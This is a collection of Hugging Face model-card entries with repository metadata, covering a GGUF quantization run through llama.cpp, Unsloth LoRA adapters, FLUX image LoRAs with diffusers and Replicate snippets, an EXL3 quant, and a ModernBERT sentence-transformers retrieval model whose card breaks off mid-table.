[GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/huihui-ai/Homunculus-abliterated) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux): ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo Triangle104/Homunculus-abliterated-Q5_K_S-GGUF --hf-file homunculus-abliterated-q5_k_s.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo Triangle104/Homunculus-abliterated-Q5_K_S-GGUF --hf-file homunculus-abliterated-q5_k_s.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the llama.cpp repo. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with the `LLAMA_CURL=1` flag along with other hardware-specific flags (e.g. LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo Triangle104/Homunculus-abliterated-Q5_K_S-GGUF --hf-file homunculus-abliterated-q5_k_s.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo Triangle104/Homunculus-abliterated-Q5_K_S-GGUF --hf-file homunculus-abliterated-q5_k_s.gguf -c 2048 ```
TarunKM/company_B-lora-adapter-45E_third_model
TarunKM
2025-06-11T11:06:20Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T11:06:15Z
--- base_model: unsloth/llama-3.1-8b-bnb-4bit tags: - text-generation-inference - transformers - unsloth - llama - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** TarunKM - **License:** apache-2.0 - **Finetuned from model :** unsloth/llama-3.1-8b-bnb-4bit This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
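Since this card gives no inference snippet, here is a minimal sketch, assuming the repo holds a LoRA adapter trained with Unsloth on the stated 4-bit base; Unsloth's `FastLanguageModel.from_pretrained` can load an adapter repository directly:

```python
from unsloth import FastLanguageModel

model, tokenizer = FastLanguageModel.from_pretrained(
    model_name="TarunKM/company_B-lora-adapter-45E_third_model",  # adapter repo
    max_seq_length=2048,
    load_in_4bit=True,  # matches the unsloth/llama-3.1-8b-bnb-4bit base
)
FastLanguageModel.for_inference(model)  # enable Unsloth's fast inference path

inputs = tokenizer("Tell me about company B:", return_tensors="pt").to("cuda")
out = model.generate(**inputs, max_new_tokens=64)
print(tokenizer.decode(out[0], skip_special_tokens=True))
```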
TarunKM/company_B-lora-adapter-45E_third
TarunKM
2025-06-11T11:06:14Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T11:06:10Z
--- base_model: unsloth/llama-3.1-8b-bnb-4bit tags: - text-generation-inference - transformers - unsloth - llama - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** TarunKM - **License:** apache-2.0 - **Finetuned from model :** unsloth/llama-3.1-8b-bnb-4bit This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
Unicorn6666/Maid
Unicorn6666
2025-06-11T11:05:55Z
0
0
diffusers
[ "diffusers", "text-to-image", "lora", "template:diffusion-lora", "base_model:black-forest-labs/FLUX.1-dev", "base_model:adapter:black-forest-labs/FLUX.1-dev", "region:us" ]
text-to-image
2025-06-11T10:42:33Z
--- tags: - text-to-image - lora - diffusers - template:diffusion-lora widget: - text: ' A cinematic and highly detailed scene featuring a photo-realistic teddy bear with black and white fur and a checkered bow on its head, standing in the background as an observer. In the foreground, a girl dressed in a classic black-and-white maid outfit, wearing a white frilly apron and matching headpiece, is sitting comfortably on the shoulders of a tall man wearing a full black balaclava that covers his entire face, revealing only his sharp black eyes. The pair are balancing precariously on a thin rope suspended high above a soft yellow and orange landscape, with a warm and inviting atmosphere created by the blurred gradient background. The girl looks directly at the viewer with a calm and confident expression, while the balaclava-clad figure focuses ahead, maintaining their balance with skill and precision. The image has a soft yet dramatic lighting style, giving depth to the textures of the maid''s fabric, the balaclava''s matte material, and the plush fur of the teddy bear. Framed with elegant black borders at the top and bottom, the composition adds a cinematic and artistic touch to the overall aesthetic. Tags: 1girl, solo (from teddy bear perspective), looking at viewer, black eyes, maid outfit, frilly apron, headpiece, black hair, bow, stuffed animal, teddy bear, balaclava, masked man, male character, black clothing, rope walking, tightrope, balance, cinematic lighting, soft background, yellow background, black borders, elegant framing ' output: url: images/alexana_15.png base_model: black-forest-labs/FLUX.1-dev instance_prompt: Maid --- # Maid <Gallery /> ## Trigger words You should use `Maid` to trigger the image generation. ## Download model Weights for this model are available in Safetensors format. [Download](/Unicorn6666/Maid/tree/main) them in the Files & versions tab.
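No code example is given in this card; below is a minimal diffusers sketch, assuming the LoRA weights sit at the repository root under a standard safetensors filename (as the "Download model" note suggests):

```python
import torch
from diffusers import AutoPipelineForText2Image

pipe = AutoPipelineForText2Image.from_pretrained(
    "black-forest-labs/FLUX.1-dev", torch_dtype=torch.bfloat16
).to("cuda")
pipe.load_lora_weights("Unicorn6666/Maid")  # trigger word: "Maid"

image = pipe("Maid, a girl in a black-and-white maid outfit balancing on a tightrope").images[0]
image.save("maid.png")
```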
Minervus00/orpheus-tts-mos
Minervus00
2025-06-11T11:04:46Z
0
0
transformers
[ "transformers", "safetensors", "llama", "text-generation", "text-generation-inference", "unsloth", "conversational", "en", "base_model:unsloth/orpheus-3b-0.1-ft", "base_model:finetune:unsloth/orpheus-3b-0.1-ft", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T11:02:52Z
--- base_model: unsloth/orpheus-3b-0.1-ft tags: - text-generation-inference - transformers - unsloth - llama license: apache-2.0 language: - en --- # Uploaded finetuned model - **Developed by:** Minervus00 - **License:** apache-2.0 - **Finetuned from model :** unsloth/orpheus-3b-0.1-ft This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
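No usage snippet is provided; here is a minimal sketch, assuming the checkpoint loads like the base Orpheus model as a causal LM (the `tara:` voice prefix is an assumption carried over from Orpheus conventions). Note that Orpheus-style TTS models emit audio codes rather than plain text, so turning the generated tokens into a waveform additionally requires the matching audio decoder (e.g. SNAC), which is out of scope here:

```python
from transformers import AutoModelForCausalLM, AutoTokenizer

repo = "Minervus00/orpheus-tts-mos"
tokenizer = AutoTokenizer.from_pretrained(repo)
model = AutoModelForCausalLM.from_pretrained(repo, device_map="auto")

# Generates token IDs; for speech output these encode audio codes that a
# separate decoder (e.g. SNAC) must turn into a waveform.
inputs = tokenizer("tara: Hello there!", return_tensors="pt").to(model.device)
out = model.generate(**inputs, max_new_tokens=256)
```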
BootesVoid/cmbpwe01700n2h4x5tin1njgr_cmbrt1pvj04b3h4x5yxz26li5
BootesVoid
2025-06-11T11:04:13Z
0
0
diffusers
[ "diffusers", "flux", "lora", "replicate", "text-to-image", "en", "base_model:black-forest-labs/FLUX.1-dev", "base_model:adapter:black-forest-labs/FLUX.1-dev", "license:other", "region:us" ]
text-to-image
2025-06-11T11:04:11Z
--- license: other license_name: flux-1-dev-non-commercial-license license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md language: - en tags: - flux - diffusers - lora - replicate base_model: "black-forest-labs/FLUX.1-dev" pipeline_tag: text-to-image # widget: # - text: >- # prompt # output: # url: https://... instance_prompt: HONEY --- # Cmbpwe01700N2H4X5Tin1Njgr_Cmbrt1Pvj04B3H4X5Yxz26Li5 <Gallery /> ## About this LoRA This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI. It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train ## Trigger words You should use `HONEY` to trigger the image generation. ## Run this LoRA with an API using Replicate ```py import replicate input = { "prompt": "HONEY", "lora_weights": "https://huggingface.co/BootesVoid/cmbpwe01700n2h4x5tin1njgr_cmbrt1pvj04b3h4x5yxz26li5/resolve/main/lora.safetensors" } output = replicate.run( "black-forest-labs/flux-dev-lora", input=input ) for index, item in enumerate(output): with open(f"output_{index}.webp", "wb") as file: file.write(item.read()) ``` ## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers) ```py from diffusers import AutoPipelineForText2Image import torch pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda') pipeline.load_lora_weights('BootesVoid/cmbpwe01700n2h4x5tin1njgr_cmbrt1pvj04b3h4x5yxz26li5', weight_name='lora.safetensors') image = pipeline('HONEY').images[0] ``` For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters) ## Training details - Steps: 2000 - Learning rate: 0.0004 - LoRA rank: 16 ## Contribute your own examples You can use the [community tab](https://huggingface.co/BootesVoid/cmbpwe01700n2h4x5tin1njgr_cmbrt1pvj04b3h4x5yxz26li5/discussions) to add images that show off what you’ve made with this LoRA.
Abstract4700/comma-v0.1-2t-8.0bpw-exl3
Abstract4700
2025-06-11T10:53:33Z
0
0
null
[ "safetensors", "llama", "text-generation", "en", "dataset:common-pile/comma_v0.1_training_dataset", "base_model:common-pile/comma-v0.1-2t", "base_model:quantized:common-pile/comma-v0.1-2t", "license:apache-2.0", "8-bit", "exl3", "region:us" ]
text-generation
2025-06-11T10:38:12Z
--- license: apache-2.0 datasets: - common-pile/comma_v0.1_training_dataset language: - en base_model: - common-pile/comma-v0.1-2t pipeline_tag: text-generation --- ## Model Description Quantization: EXL3, 8.0 bits per weight max_seq_len: 4096 ### Model Sources - **Base repository:** https://huggingface.co/common-pile/comma-v0.1-2t Comma v0.1-2T is a 7 billion parameter language model trained on 2 trillion tokens from [the Comma v0.1 dataset](https://huggingface.co/datasets/common-pile/comma_v0.1_training_dataset), comprising openly licensed text from [the Common Pile](https://huggingface.co/collections/common-pile/common-pile-v01-68307d37df48e36f02717f21). Comma v0.1-2T is a "base model" that can be used as the starting point for finetuning and post-training. ## Citation ```bibtex @article{kandpal2025common, title={{The Common Pile v0.1: An 8TB Dataset of Public Domain and Openly Licensed Text}}, author={Nikhil Kandpal and Brian Lester and Colin Raffel and Sebastian Majstorovic and Stella Biderman and Baber Abbasi and Luca Soldaini and Enrico Shippole and A. Feder Cooper and Aviya Skowron and Shayne Longpre and Lintang Sutawika and Alon Albalak and Zhenlin Xu and Guilherme Penedo and Loubna Ben and Elie Bakouch and John David and Honglu Fan and Dashiell Stander and Guangyu Song and Aaron Gokaslan and John Kirchenbauer and Tom Goldstein and Brian R and Bhavya Kailkhura and Tyler Murray}, journal={arXiv preprint}, year={2025} } ```
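The card gives no loading snippet, and EXL3 weights are consumed by ExLlamaV3-based runtimes (for example TabbyAPI) whose exact Python entry points are not documented here, so this sketch only fetches the weights with `huggingface_hub` and leaves serving to the runtime:

```python
from huggingface_hub import snapshot_download

# Download the quantized weights locally; point an ExLlamaV3-compatible
# runtime (e.g. TabbyAPI) at this directory afterwards.
local_dir = snapshot_download("Abstract4700/comma-v0.1-2t-8.0bpw-exl3")
print(local_dir)
```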
frossardr/final_MCQA_qlora-finetuned
frossardr
2025-06-11T10:51:00Z
0
0
peft
[ "peft", "safetensors", "arxiv:1910.09700", "base_model:frossardr/final_model_MCQA", "base_model:adapter:frossardr/final_model_MCQA", "region:us" ]
null
2025-06-11T10:11:16Z
--- base_model: frossardr/final_model_MCQA library_name: peft --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed] ### Framework versions - PEFT 0.15.2
kokolamba/ModernBERT-base-DPR-8e-05-CMNRL-bs512
kokolamba
2025-06-11T10:49:54Z
0
0
sentence-transformers
[ "sentence-transformers", "safetensors", "modernbert", "sentence-similarity", "feature-extraction", "generated_from_trainer", "dataset_size:1250000", "loss:CachedMultipleNegativesRankingLoss", "en", "dataset:sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1", "arxiv:1908.10084", "arxiv:2101.06983", "base_model:answerdotai/ModernBERT-base", "base_model:finetune:answerdotai/ModernBERT-base", "model-index", "autotrain_compatible", "endpoints_compatible", "region:us" ]
sentence-similarity
2025-06-11T10:49:38Z
--- language: - en tags: - sentence-transformers - sentence-similarity - feature-extraction - generated_from_trainer - dataset_size:1250000 - loss:CachedMultipleNegativesRankingLoss base_model: answerdotai/ModernBERT-base widget: - source_sentence: what county is lyndhurst, ohio in sentences: - This article is about the song written by Kenneth Gamble, Leon Huff and Cary Gilbert. For the Tina Turner song, see Don't Leave Me This Way (Tina Turner song). Don't Leave Me This Way is a song written by Kenneth Gamble, Leon Huff and Cary Gilbert. First charting as a hit for Harold Melvin & the Blue Notes featuring Teddy Pendergrass, an act on Gamble & Huff's Philadelphia International label in 1975, Don't Leave Me This Way was later a huge disco hit for Motown artist Thelma Houston in 1977. - "Lyndhurst is a city in Cuyahoga County, Ohio, United States. The population was\ \ 14,001 at the 2010 census. Lyndhurst is located in northeastern Ohio, and is\ \ a suburb of Cleveland. A small part of Lyndhurst was originally part of Mayfield\ \ Township. It used to be called Euclidville before Lyndhurst was chosen. Lyndhurst\ \ is located at 41°31′17″N 81°29′25″W / 41.52139°N 81.49028°W\ \ / 41.52139; -81.49028 (41.521352, -81.490141)." - Welcome to Trumbull County... Trumbull County, the county seat, located in Warren, Ohio, consists of a combination of both urban and rural communities situated in the northeast corner of Ohio. It is situated roughly between the Youngstown, Cleveland and Akron corridors. - source_sentence: who founded the american graphophone company sentences: - In 1886, Graham Bell and Charles Sumner Tainter founded the American Graphophone Company to distribute and sell graphophones in the US and Canada under license from the Volta Graphophone Company. In 1890, the American Graphophone Company stopped production of new phonographs due to sagging orders. - ShelfGenie How much does a ShelfGenie franchise cost? ShelfGenie has a franchise fee of up to $45,000, with a total initial investment range of $70,100 to $107,750. Local ShelfGenie franchise opportunities. ShelfGenie is looking to grow in a number of cities around the country. To find out if there's a franchise opportunity in your city, unlock more information. - "A+E Networks. The technology that made the modern music business possible came\ \ into existence in the New Jersey laboratory where Thomas Alva Edison created\ \ the first device to both record sound and play it back. He was awarded U.S.\ \ Patent No. 200,521 for his invention–the phonograph–on this\ \ day in 1878." - source_sentence: is housekeeping camp flooded? sentences: - 'What is the importance of housekeeping at work? A: Workplace housekeeping promotes sanitation, safety, organization and productivity. It also boosts morale. Daily housekeeping maintenance keeps the workplac... Full Answer >' - The back patio area of a cabin is partially submerged in flood water at Housekeeping Camp on Monday, Jan. 9, 2017, in Yosemite National Park. The Merced River, swollen with storm runoff, crested at 12.7 feet at 4 a.m. SILVIA FLORES [email protected]. - "1 Bake for 8 minutes, then rotate the pan and check the underside of the bagels.\ \ 2 If they’re getting too dark, place another pan under the baking sheet.\ \ ( 3 Doubling the pan will insulate the first baking sheet.) Bake for another\ \ 8 to 12 minutes, until the bagels are a golden brown. 4 13." 
- source_sentence: causes for infection in the nerve of tooth sentences: - If a cavity is causing the toothache, your dentist will fill the cavity or possibly extract the tooth, if necessary. A root canal might be needed if the cause of the toothache is determined to be an infection of the tooth's nerve. Bacteria that have worked their way into the inner aspects of the tooth cause such an infection. An antibiotic may be prescribed if there is fever or swelling of the jaw. - "According to Article III, Section 1 of the Constitution, judges and justices\ \ of the Judicial Branch serve during good behavior.. This means they are appointed\ \ for life, unless they are impeached and removed from office. + 50 others\ \ found this useful.he term length for members of the House are two years and\ \ a staggering six years for members of the Senate." - Inflamed or infected pulp (pulpitis) most often causes a toothache. To relieve the pain and prevent further complications, the tooth may be extracted (surgically removed) or saved by root canal treatment. - source_sentence: what county is hayden in sentences: - Normally, the Lead Agency is the agency with general governmental powers such as a city or a county. Agencies with limited powers or districts that provide a public service/utility such as a recreation and park district will tend to be a Responsible Agency. - According to the United States Census Bureau, the city has a total area of 9.61 square miles (24.89 km2), of which 9.60 square miles (24.86 km2) is land and 0.01 square miles (0.03 km2) is water. It lies at the southwestern end of Hayden Lake, and the elevation of the city is 2,287 feet (697 m) above sea level. Hayden is located on U.S. Route 95 at the junction of Route 41. It is also four miles (6 km) north of Interstate 90 and Coeur d'Alene. The Coeur d'Alene airport is northwest of Hayden. - Hayden is a city in Kootenai County, Idaho, United States. Located in the northern portion of the state, just north of Coeur d'Alene, its population was 13,294 at the 2010 census. datasets: - sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1 pipeline_tag: sentence-similarity library_name: sentence-transformers metrics: - cosine_accuracy model-index: - name: SentenceTransformer based on answerdotai/ModernBERT-base results: - task: type: triplet name: Triplet dataset: name: msmarco co condenser dev type: msmarco-co-condenser-dev metrics: - type: cosine_accuracy value: 0.9879999756813049 name: Cosine Accuracy --- # SentenceTransformer based on answerdotai/ModernBERT-base This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [answerdotai/ModernBERT-base](https://huggingface.co/answerdotai/ModernBERT-base) on the [msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1](https://huggingface.co/datasets/sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1) dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more. 
## Model Details ### Model Description - **Model Type:** Sentence Transformer - **Base model:** [answerdotai/ModernBERT-base](https://huggingface.co/answerdotai/ModernBERT-base) <!-- at revision 8949b909ec900327062f0ebf497f51aef5e6f0c8 --> - **Maximum Sequence Length:** 8192 tokens - **Output Dimensionality:** 768 dimensions - **Similarity Function:** Cosine Similarity - **Training Dataset:** - [msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1](https://huggingface.co/datasets/sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1) - **Language:** en <!-- - **License:** Unknown --> ### Model Sources - **Documentation:** [Sentence Transformers Documentation](https://sbert.net) - **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers) - **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers) ### Full Model Architecture ``` SentenceTransformer( (0): Transformer({'max_seq_length': 8192, 'do_lower_case': False}) with Transformer model: ModernBertModel (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True}) ) ``` ## Usage ### Direct Usage (Sentence Transformers) First install the Sentence Transformers library: ```bash pip install -U sentence-transformers ``` Then you can load this model and run inference. ```python from sentence_transformers import SentenceTransformer # Download from the 🤗 Hub model = SentenceTransformer("kokolamba/ModernBERT-base-DPR-8e-05-CMNRL-bs512") # Run inference sentences = [ 'what county is hayden in', "Hayden is a city in Kootenai County, Idaho, United States. Located in the northern portion of the state, just north of Coeur d'Alene, its population was 13,294 at the 2010 census.", "According to the United States Census Bureau, the city has a total area of 9.61 square miles (24.89 km2), of which 9.60 square miles (24.86 km2) is land and 0.01 square miles (0.03 km2) is water. It lies at the southwestern end of Hayden Lake, and the elevation of the city is 2,287 feet (697 m) above sea level. Hayden is located on U.S. Route 95 at the junction of Route 41. It is also four miles (6 km) north of Interstate 90 and Coeur d'Alene. The Coeur d'Alene airport is northwest of Hayden.", ] embeddings = model.encode(sentences) print(embeddings.shape) # [3, 768] # Get the similarity scores for the embeddings similarities = model.similarity(embeddings, embeddings) print(similarities.shape) # [3, 3] ``` <!-- ### Direct Usage (Transformers) <details><summary>Click to see the direct usage in Transformers</summary> </details> --> <!-- ### Downstream Usage (Sentence Transformers) You can finetune this model on your own dataset. 
<details><summary>Click to expand</summary> </details> --> <!-- ### Out-of-Scope Use *List how the model may foreseeably be misused and address what users ought not to do with the model.* --> ## Evaluation ### Metrics #### Triplet * Dataset: `msmarco-co-condenser-dev` * Evaluated with [<code>TripletEvaluator</code>](https://sbert.net/docs/package_reference/sentence_transformer/evaluation.html#sentence_transformers.evaluation.TripletEvaluator) | Metric | Value | |:--------------------|:----------| | **cosine_accuracy** | **0.988** | <!-- ## Bias, Risks and Limitations *What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.* --> <!-- ### Recommendations *What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.* --> ## Training Details ### Training Dataset #### msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1 * Dataset: [msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1](https://huggingface.co/datasets/sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1) at [84ed2d3](https://huggingface.co/datasets/sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1/tree/84ed2d35626f617d890bd493b4d6db69a741e0e2) * Size: 1,250,000 training samples * Columns: <code>query</code>, <code>positive</code>, and <code>negative</code> * Approximate statistics based on the first 1000 samples: | | query | positive | negative | |:--------|:---------------------------------------------------------------------------------|:------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------| | type | string | string | string | | details | <ul><li>min: 4 tokens</li><li>mean: 9.26 tokens</li><li>max: 34 tokens</li></ul> | <ul><li>min: 17 tokens</li><li>mean: 79.14 tokens</li><li>max: 222 tokens</li></ul> | <ul><li>min: 24 tokens</li><li>mean: 80.09 tokens</li><li>max: 436 tokens</li></ul> | * Samples: | query | positive | negative | |:---------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | <code>what is the meaning of menu planning</code> | <code>Menu planning is the selection of a menu for an event. Such as picking out the dinner for your wedding or even a meal at a Birthday Party. Menu planning is when you are preparing a calendar of meals and you have to sit down and decide what meat and veggies you want to serve on each certain day.</code> | <code>Menu Costs. In economics, a menu cost is the cost to a firm resulting from changing its prices. 
The name stems from the cost of restaurants literally printing new menus, but economists use it to refer to the costs of changing nominal prices in general.</code> | | <code>how old is brett butler</code> | <code>Brett Butler is 59 years old. To be more precise (and nerdy), the current age as of right now is 21564 days or (even more geeky) 517536 hours. That's a lot of hours!</code> | <code>Passed in: St. John's, Newfoundland and Labrador, Canada. Passed on: 16/07/2016. Published in the St. John's Telegram. Passed away suddenly at the Health Sciences Centre surrounded by his loving family, on July 16, 2016 Robert (Bobby) Joseph Butler, age 52 years. Predeceased by his special aunt Geri Murrin and uncle Mike Mchugh; grandparents Joe and Margaret Murrin and Jack and Theresa Butler.</code> | | <code>when was the last navajo treaty sign?</code> | <code>In Executive Session, Senate of the United States, July 25, 1868. Resolved, (two-thirds of the senators present concurring,) That the Senate advise and consent to the ratification of the treaty between the United States and the Navajo Indians, concluded at Fort Sumner, New Mexico, on the first day of June, 1868.</code> | <code>Share Treaty of Greenville. The Treaty of Greenville was signed August 3, 1795, between the United States, represented by Gen. Anthony Wayne, and chiefs of the Indian tribes located in the Northwest Territory, including the Wyandots, Delawares, Shawnees, Ottawas, Miamis, and others.</code> | * Loss: [<code>CachedMultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss) with these parameters: ```json { "scale": 20.0, "similarity_fct": "cos_sim", "mini_batch_size": 16 } ``` ### Evaluation Dataset #### msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1 * Dataset: [msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1](https://huggingface.co/datasets/sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1) at [84ed2d3](https://huggingface.co/datasets/sentence-transformers/msmarco-co-condenser-margin-mse-sym-mnrl-mean-v1/tree/84ed2d35626f617d890bd493b4d6db69a741e0e2) * Size: 1,000 evaluation samples * Columns: <code>query</code>, <code>positive</code>, and <code>negative</code> * Approximate statistics based on the first 1000 samples: | | query | positive | negative | |:--------|:--------------------------------------------------------------------------------|:------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------| | type | string | string | string | | details | <ul><li>min: 4 tokens</li><li>mean: 9.2 tokens</li><li>max: 27 tokens</li></ul> | <ul><li>min: 21 tokens</li><li>mean: 80.44 tokens</li><li>max: 241 tokens</li></ul> | <ul><li>min: 23 tokens</li><li>mean: 80.38 tokens</li><li>max: 239 tokens</li></ul> | * Samples: | query | positive | negative | 
|:------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | <code>what county is holly springs nc in</code> | <code>Holly Springs, North Carolina. Holly Springs is a town in Wake County, North Carolina, United States. As of the 2010 census, the town population was 24,661, over 2½ times its population in 2000. Contents.</code> | <code>The Mt. Holly Springs Park & Resort. One of the numerous trolley routes that carried people around the county at the turn of the century was the Carlisle & Mt. Holly Railway Company. The “Holly Trolley” as it came to be known was put into service by Patricio Russo and made its first run on May 14, 1901.</code> | | <code>how long does nyquil stay in your system</code> | <code>In order to understand exactly how long Nyquil lasts, it is absolutely vital to learn about the various ingredients in the drug. One of the ingredients found in Nyquil is Doxylamine, which is an antihistamine. This specific medication has a biological half-life or 6 to 12 hours. With this in mind, it is possible for the drug to remain in the system for a period of 12 to 24 hours. It should be known that the specifics will depend on a wide variety of different factors, including your age and metabolism.</code> | <code>I confirmed that NyQuil is about 10% alcohol, a higher content than most domestic beers. When I asked about the relatively high proof, I was told that the alcohol dilutes the active ingredients. The alcohol free version is there for customers with 